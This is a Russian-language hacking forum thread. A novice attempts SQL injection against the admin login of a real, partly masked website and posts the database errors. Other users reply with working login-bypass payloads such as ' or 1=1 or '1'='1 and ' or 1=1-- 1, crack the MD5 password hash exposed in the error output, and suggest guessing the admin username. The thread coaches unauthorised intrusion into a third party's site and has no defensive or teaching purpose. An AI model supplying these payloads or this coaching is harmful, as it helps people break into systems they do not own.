Форум АНТИЧАТ - Уязвимосьть при авторизации

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Уязвимосьть при авторизации (https://forum.antichat.xyz/showthread.php?t=97381)

Уязвимосьть при авторизации

Привет всем.
Вот заинтересовался одним сайтом... быстренько подобрал адрес к админке ****.ru/admin/
(по всей видимости там cms joomla ...еси правильно ...ну или както так)
И передомной несколько полей: лог. , пас., и защитная строка.

В качестве лога ввожу ' or '1'=1' и любой пас...
Мне выдает

Код:

Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or '1'=1'' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/********.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*********/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/********.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/********.com/data/f/db.inc.php on line 43

Я как новенький в етом деле незнаю че мне делать дальше... подскажите плз
пасиба заранее

' or '1'=1'/* попробуй

Попробуй логин :admin (если не подойдёт, ищи как ник админа на сайте)

Код:

pass='b59c67bf196a4758191e42f76670ceba'

пасс был зашифрован MD5 : 1111
Возможно попадёшь в админку.

Этот пас я вводил когда в логе было ' or '1'=1'

При вводе ' or '1'=1'/* почти тоже самое

Код:

Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms*****_admin.users WHERE login='' or '1'=1'/\*' AND pass='698d51a19d8a121ce581499d7b701668' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/*****.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*****.com/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/*****.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/*****.com/data/f/db.inc.php on line 43

люди, посоветуйте чтото, плиз... я уже незнаю что делать(

Ты у меня ник сер, да))?
master01 вроде как все написал!
А если что то скинь мне Линк в личку.

Может линк выложишь?
Людям так проще будет...

1. Для вопросов есть спец тема.
2. А почему ' or '1'=1'?
Попробуй: ' or 1=1 or '1'='1
Тогда запрос будет таким:

Код:

SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or 1=1 or '1'='1' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0;

т.е. условие выполнится.
Или попробуй: ' or 1=1-- 1

Это не джумла, определенно, судя по путям:

Цитата:

/usr/home/sites/*****.com/data/f/db.inc.php